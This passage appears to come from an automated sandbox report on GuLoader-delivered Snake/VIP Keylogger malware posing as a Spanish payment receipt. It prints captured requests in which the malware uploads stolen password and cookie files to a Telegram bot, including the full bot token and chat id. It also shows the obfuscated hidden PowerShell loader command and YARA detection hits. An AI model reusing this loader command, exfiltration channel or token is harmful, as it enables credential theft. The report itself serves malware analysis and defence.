                                                                                                                                                                                  2024-12-16 17:29:19 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  11192.168.2.449806149.154.167.2204438012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-16 17:29:21 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20and%20Time:%2017/12/2024%20/%2019:35:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20065367%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                                  Host: api.telegram.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-16 17:29:21 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:29:21 GMT
                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                  2024-12-16 17:29:21 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  12192.168.2.449825149.154.167.2204438012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-16 17:29:29 UTC344OUTPOST /bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234817354&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=------------------------8dd1f5b7140c899
                                                                                                                                                                                  Host: api.telegram.org
                                                                                                                                                                                  Content-Length: 581
                                                                                                                                                                                  2024-12-16 17:29:29 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 35 62 37 31 34 30 63 38 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 30 36 35 33 36 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 31 32 3a 32 38 3a 34 39 0d
                                                                                                                                                                                  Data Ascii: --------------------------8dd1f5b7140c899Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:065367Date and Time: 16/12/2024 / 12:28:49
                                                                                                                                                                                  2024-12-16 17:29:29 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:29:29 GMT
                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                  Content-Length: 526
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                  2024-12-16 17:29:29 UTC526INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 38 34 39 35 33 31 32 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 7a 69 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 65 6d 6d 61 73 6f 75 74 68 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 32 33 34 38 31 37 33 35 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 41 70 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 53 6f 75 74 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6f 75 74 30 39 38 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 37 30 31 36 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b
                                                                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":319,"from":{"id":7884953123,"is_bot":true,"first_name":"Mazi","username":"emmasouthbot"},"chat":{"id":5234817354,"first_name":"Api","last_name":"South","username":"sout098","type":"private"},"date":1734370169,"document":{


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  13192.168.2.449833149.154.167.2204438012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-16 17:29:32 UTC374OUTPOST /bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234817354&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=------------------------8dd1f89892680e0
                                                                                                                                                                                  Host: api.telegram.org
                                                                                                                                                                                  Content-Length: 7046
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-16 17:29:32 UTC7046OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 38 39 38 39 32 36 38 30 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 30 36 35 33 36 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f
                                                                                                                                                                                  Data Ascii: --------------------------8dd1f89892680e0Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:065367Date and Time: 16/12/2024 /
                                                                                                                                                                                  2024-12-16 17:29:33 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:29:33 GMT
                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                  Content-Length: 539
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                  2024-12-16 17:29:33 UTC539INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 38 34 39 35 33 31 32 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 7a 69 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 65 6d 6d 61 73 6f 75 74 68 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 32 33 34 38 31 37 33 35 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 41 70 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 53 6f 75 74 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6f 75 74 30 39 38 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 37 30 31 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b
                                                                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":320,"from":{"id":7884953123,"is_bot":true,"first_name":"Mazi","username":"emmasouthbot"},"chat":{"id":5234817354,"first_name":"Api","last_name":"South","username":"sout098","type":"private"},"date":1734370173,"document":{


                                                                                                                                                                                  Statistics

                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                  Behavior

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  System Behavior

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                  Start time:12:27:57
                                                                                                                                                                                  Start date:16/12/2024
                                                                                                                                                                                  Path:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Justificante pago-09453256434687.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'106'880 bytes
                                                                                                                                                                                  MD5 hash:4252CD5753DEF4A484FB3313E1029E66
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                  Start time:12:28:00
                                                                                                                                                                                  Start date:16/12/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) "
                                                                                                                                                                                  Imagebase:0xd20000
                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2067270709.0000000009B22000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                  Start time:12:28:00
                                                                                                                                                                                  Start date:16/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                  Start time:12:28:34
                                                                                                                                                                                  Start date:16/12/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                                                  Imagebase:0x9a0000
                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Disassembly

                                                                                                                                                                                  Reset < >

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:22.2%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                    Signature Coverage:17%
                                                                                                                                                                                    Total number of Nodes:1383
                                                                                                                                                                                    Total number of Limit Nodes:34
                                                                                                                                                                                    execution_graph 3209 401941 3210 401943 3209->3210 3215 402da6 3210->3215 3216 402db2 3215->3216 3261 406544 3216->3261 3219 401948 3221 405c13 3219->3221 3303 405ede 3221->3303 3224 405c52 3227 405d7d 3224->3227 3317 406507 lstrcpynW 3224->3317 3225 405c3b DeleteFileW 3226 401951 3225->3226 3227->3226 3346 40683d FindFirstFileW 3227->3346 3229 405c78 3230 405c8b 3229->3230 3231 405c7e lstrcatW 3229->3231 3318 405e22 lstrlenW 3230->3318 3232 405c91 3231->3232 3235 405ca1 lstrcatW 3232->3235 3236 405c97 3232->3236 3238 405cac lstrlenW FindFirstFileW 3235->3238 3236->3235 3236->3238 3241 405d72 3238->3241 3259 405cce 3238->3259 3239 405d9b 3349 405dd6 lstrlenW CharPrevW 3239->3349 3241->3227 3244 405d55 FindNextFileW 3247 405d6b FindClose 3244->3247 3244->3259 3245 405bcb 5 API calls 3246 405dad 3245->3246 3248 405db1 3246->3248 3249 405dc7 3246->3249 3247->3241 3248->3226 3252 405569 24 API calls 3248->3252 3251 405569 24 API calls 3249->3251 3251->3226 3254 405dbe 3252->3254 3253 405c13 60 API calls 3253->3259 3256 4062c7 36 API calls 3254->3256 3255 405569 24 API calls 3255->3244 3257 405dc5 3256->3257 3257->3226 3259->3244 3259->3253 3259->3255 3322 406507 lstrcpynW 3259->3322 3323 405bcb 3259->3323 3331 405569 3259->3331 3342 4062c7 MoveFileExW 3259->3342 3262 406551 3261->3262 3263 406774 3262->3263 3266 406742 lstrlenW 3262->3266 3267 406659 GetSystemDirectoryW 3262->3267 3271 406544 10 API calls 3262->3271 3272 40666c GetWindowsDirectoryW 3262->3272 3273 4066e3 lstrcatW 3262->3273 3274 406544 10 API calls 3262->3274 3275 40678e 5 API calls 3262->3275 3276 40669b SHGetSpecialFolderLocation 3262->3276 3287 4063d5 3262->3287 3292 40644e wsprintfW 3262->3292 3293 406507 lstrcpynW 3262->3293 3264 402dd3 3263->3264 3294 406507 lstrcpynW 3263->3294 3264->3219 3278 40678e 3264->3278 3266->3262 3267->3262 3271->3266 3272->3262 3273->3262 3274->3262 3275->3262 3276->3262 3277 4066b3 SHGetPathFromIDListW CoTaskMemFree 3276->3277 3277->3262 3279 40679b 3278->3279 3281 406804 CharNextW 3279->3281 3282 406811 3279->3282 3285 4067f0 CharNextW 3279->3285 3286 4067ff CharNextW 3279->3286 3299 405e03 3279->3299 3280 406816 CharPrevW 3280->3282 3281->3279 3281->3282 3282->3280 3283 406837 3282->3283 3283->3219 3285->3279 3286->3281 3295 406374 3287->3295 3290 406439 3290->3262 3291 406409 RegQueryValueExW RegCloseKey 3291->3290 3292->3262 3293->3262 3294->3264 3296 406383 3295->3296 3297 406387 3296->3297 3298 40638c RegOpenKeyExW 3296->3298 3297->3290 3297->3291 3298->3297 3300 405e09 3299->3300 3301 405e1f 3300->3301 3302 405e10 CharNextW 3300->3302 3301->3279 3302->3300 3352 406507 lstrcpynW 3303->3352 3305 405eef 3353 405e81 CharNextW CharNextW 3305->3353 3308 405c33 3308->3224 3308->3225 3309 40678e 5 API calls 3315 405f05 3309->3315 3310 405f36 lstrlenW 3311 405f41 3310->3311 3310->3315 3313 405dd6 3 API calls 3311->3313 3312 40683d 2 API calls 3312->3315 3314 405f46 GetFileAttributesW 3313->3314 3314->3308 3315->3308 3315->3310 3315->3312 3316 405e22 2 API calls 3315->3316 3316->3310 3317->3229 3319 405e30 3318->3319 3320 405e42 3319->3320 3321 405e36 CharPrevW 3319->3321 3320->3232 3321->3319 3321->3320 3322->3259 3359 405fd2 GetFileAttributesW 3323->3359 3326 405bf8 3326->3259 3327 405be6 RemoveDirectoryW 3329 405bf4 3327->3329 3328 405bee DeleteFileW 3328->3329 3329->3326 3330 405c04 SetFileAttributesW 3329->3330 3330->3326 3332 405584 3331->3332 3333 405626 3331->3333 3334 4055a0 lstrlenW 3332->3334 3335 406544 17 API calls 3332->3335 3333->3259 3336 4055c9 3334->3336 3337 4055ae lstrlenW 3334->3337 3335->3334 3339 4055dc 3336->3339 3340 4055cf SetWindowTextW 3336->3340 3337->3333 3338 4055c0 lstrcatW 3337->3338 3338->3336 3339->3333 3341 4055e2 SendMessageW SendMessageW SendMessageW 3339->3341 3340->3339 3341->3333 3343 4062e8 3342->3343 3344 4062db 3342->3344 3343->3259 3362 40614d 3344->3362 3347 406853 FindClose 3346->3347 3348 405d97 3346->3348 3347->3348 3348->3226 3348->3239 3350 405df2 lstrcatW 3349->3350 3351 405da1 3349->3351 3350->3351 3351->3245 3352->3305 3354 405e9e 3353->3354 3357 405eb0 3353->3357 3356 405eab CharNextW 3354->3356 3354->3357 3355 405ed4 3355->3308 3355->3309 3356->3355 3357->3355 3358 405e03 CharNextW 3357->3358 3358->3357 3360 405bd7 3359->3360 3361 405fe4 SetFileAttributesW 3359->3361 3360->3326 3360->3327 3360->3328 3361->3360 3363 4061a3 GetShortPathNameW 3362->3363 3364 40617d 3362->3364 3366 4062c2 3363->3366 3367 4061b8 3363->3367 3389 405ff7 GetFileAttributesW CreateFileW 3364->3389 3366->3343 3367->3366 3369 4061c0 wsprintfA 3367->3369 3368 406187 CloseHandle GetShortPathNameW 3368->3366 3370 40619b 3368->3370 3371 406544 17 API calls 3369->3371 3370->3363 3370->3366 3372 4061e8 3371->3372 3390 405ff7 GetFileAttributesW CreateFileW 3372->3390 3374 4061f5 3374->3366 3375 406204 GetFileSize GlobalAlloc 3374->3375 3376 406226 3375->3376 3377 4062bb CloseHandle 3375->3377 3391 40607a ReadFile 3376->3391 3377->3366 3382 406245 lstrcpyA 3387 406267 3382->3387 3383 406259 3384 405f5c 4 API calls 3383->3384 3384->3387 3385 40629e SetFilePointer 3398 4060a9 WriteFile 3385->3398 3387->3385 3389->3368 3390->3374 3392 406098 3391->3392 3392->3377 3393 405f5c lstrlenA 3392->3393 3394 405f9d lstrlenA 3393->3394 3395 405fa5 3394->3395 3396 405f76 lstrcmpiA 3394->3396 3395->3382 3395->3383 3396->3395 3397 405f94 CharNextA 3396->3397 3397->3394 3399 4060c7 GlobalFree 3398->3399 3399->3377 3400 4015c1 3401 402da6 17 API calls 3400->3401 3402 4015c8 3401->3402 3403 405e81 4 API calls 3402->3403 3415 4015d1 3403->3415 3404 401631 3406 401663 3404->3406 3407 401636 3404->3407 3405 405e03 CharNextW 3405->3415 3409 401423 24 API calls 3406->3409 3427 401423 3407->3427 3416 40165b 3409->3416 3414 40164a SetCurrentDirectoryW 3414->3416 3415->3404 3415->3405 3417 401617 GetFileAttributesW 3415->3417 3419 405ad2 3415->3419 3422 405a38 CreateDirectoryW 3415->3422 3431 405ab5 CreateDirectoryW 3415->3431 3417->3415 3434 4068d4 GetModuleHandleA 3419->3434 3423 405a85 3422->3423 3424 405a89 GetLastError 3422->3424 3423->3415 3424->3423 3425 405a98 SetFileSecurityW 3424->3425 3425->3423 3426 405aae GetLastError 3425->3426 3426->3423 3428 405569 24 API calls 3427->3428 3429 401431 3428->3429 3430 406507 lstrcpynW 3429->3430 3430->3414 3432 405ac5 3431->3432 3433 405ac9 GetLastError 3431->3433 3432->3415 3433->3432 3435 4068f0 3434->3435 3436 4068fa GetProcAddress 3434->3436 3440 406864 GetSystemDirectoryW 3435->3440 3438 405ad9 3436->3438 3438->3415 3439 4068f6 3439->3436 3439->3438 3441 406886 wsprintfW LoadLibraryExW 3440->3441 3441->3439 4067 401c43 4068 402d84 17 API calls 4067->4068 4069 401c4a 4068->4069 4070 402d84 17 API calls 4069->4070 4071 401c57 4070->4071 4072 401c6c 4071->4072 4073 402da6 17 API calls 4071->4073 4074 402da6 17 API calls 4072->4074 4078 401c7c 4072->4078 4073->4072 4074->4078 4075 401cd3 4077 402da6 17 API calls 4075->4077 4076 401c87 4079 402d84 17 API calls 4076->4079 4080 401cd8 4077->4080 4078->4075 4078->4076 4081 401c8c 4079->4081 4083 402da6 17 API calls 4080->4083 4082 402d84 17 API calls 4081->4082 4084 401c98 4082->4084 4085 401ce1 FindWindowExW 4083->4085 4086 401cc3 SendMessageW 4084->4086 4087 401ca5 SendMessageTimeoutW 4084->4087 4088 401d03 4085->4088 4086->4088 4087->4088 4089 4028c4 4090 4028ca 4089->4090 4091 4028d2 FindClose 4090->4091 4092 402c2a 4090->4092 4091->4092 4103 4016cc 4104 402da6 17 API calls 4103->4104 4105 4016d2 GetFullPathNameW 4104->4105 4106 4016ec 4105->4106 4112 40170e 4105->4112 4108 40683d 2 API calls 4106->4108 4106->4112 4107 401723 GetShortPathNameW 4109 402c2a 4107->4109 4110 4016fe 4108->4110 4110->4112 4113 406507 lstrcpynW 4110->4113 4112->4107 4112->4109 4113->4112 4114 401e4e GetDC 4115 402d84 17 API calls 4114->4115 4116 401e60 GetDeviceCaps MulDiv ReleaseDC 4115->4116 4117 402d84 17 API calls 4116->4117 4118 401e91 4117->4118 4119 406544 17 API calls 4118->4119 4120 401ece CreateFontIndirectW 4119->4120 4121 402638 4120->4121 4122 402950 4123 402da6 17 API calls 4122->4123 4124 40295c 4123->4124 4125 402972 4124->4125 4126 402da6 17 API calls 4124->4126 4127 405fd2 2 API calls 4125->4127 4126->4125 4128 402978 4127->4128 4150 405ff7 GetFileAttributesW CreateFileW 4128->4150 4130 402985 4131 402a3b 4130->4131 4132 4029a0 GlobalAlloc 4130->4132 4133 402a23 4130->4133 4134 402a42 DeleteFileW 4131->4134 4135 402a55 4131->4135 4132->4133 4136 4029b9 4132->4136 4137 4032b4 35 API calls 4133->4137 4134->4135 4151 4034af SetFilePointer 4136->4151 4139 402a30 CloseHandle 4137->4139 4139->4131 4140 4029bf 4141 403499 ReadFile 4140->4141 4142 4029c8 GlobalAlloc 4141->4142 4143 4029d8 4142->4143 4144 402a0c 4142->4144 4146 4032b4 35 API calls 4143->4146 4145 4060a9 WriteFile 4144->4145 4147 402a18 GlobalFree 4145->4147 4149 4029e5 4146->4149 4147->4133 4148 402a03 GlobalFree 4148->4144 4149->4148 4150->4130 4151->4140 4152 404ed0 GetDlgItem GetDlgItem 4153 404f22 7 API calls 4152->4153 4161 405147 4152->4161 4154 404fc9 DeleteObject 4153->4154 4155 404fbc SendMessageW 4153->4155 4156 404fd2 4154->4156 4155->4154 4157 405009 4156->4157 4162 406544 17 API calls 4156->4162 4159 404463 18 API calls 4157->4159 4158 405229 4160 4052d5 4158->4160 4169 405282 SendMessageW 4158->4169 4195 40513a 4158->4195 4163 40501d 4159->4163 4164 4052e7 4160->4164 4165 4052df SendMessageW 4160->4165 4161->4158 4180 4051b6 4161->4180 4206 404e1e SendMessageW 4161->4206 4166 404feb SendMessageW SendMessageW 4162->4166 4168 404463 18 API calls 4163->4168 4172 405300 4164->4172 4173 4052f9 ImageList_Destroy 4164->4173 4181 405310 4164->4181 4165->4164 4166->4156 4186 40502e 4168->4186 4175 405297 SendMessageW 4169->4175 4169->4195 4170 40521b SendMessageW 4170->4158 4171 4044ca 8 API calls 4176 4054d6 4171->4176 4177 405309 GlobalFree 4172->4177 4172->4181 4173->4172 4174 40548a 4182 40549c ShowWindow GetDlgItem ShowWindow 4174->4182 4174->4195 4179 4052aa 4175->4179 4177->4181 4178 405109 GetWindowLongW SetWindowLongW 4183 405122 4178->4183 4190 4052bb SendMessageW 4179->4190 4180->4158 4180->4170 4181->4174 4197 40534b 4181->4197 4211 404e9e 4181->4211 4182->4195 4184 405127 ShowWindow 4183->4184 4185 40513f 4183->4185 4204 404498 SendMessageW 4184->4204 4205 404498 SendMessageW 4185->4205 4186->4178 4189 405081 SendMessageW 4186->4189 4191 405104 4186->4191 4192 4050d3 SendMessageW 4186->4192 4193 4050bf SendMessageW 4186->4193 4189->4186 4190->4160 4191->4178 4191->4183 4192->4186 4193->4186 4195->4171 4196 405455 4198 405460 InvalidateRect 4196->4198 4200 40546c 4196->4200 4199 405379 SendMessageW 4197->4199 4201 40538f 4197->4201 4198->4200 4199->4201 4200->4174 4220 404dd9 4200->4220 4201->4196 4202 405403 SendMessageW SendMessageW 4201->4202 4202->4201 4204->4195 4205->4161 4207 404e41 GetMessagePos ScreenToClient SendMessageW 4206->4207 4208 404e7d SendMessageW 4206->4208 4209 404e75 4207->4209 4210 404e7a 4207->4210 4208->4209 4209->4180 4210->4208 4223 406507 lstrcpynW 4211->4223 4213 404eb1 4224 40644e wsprintfW 4213->4224 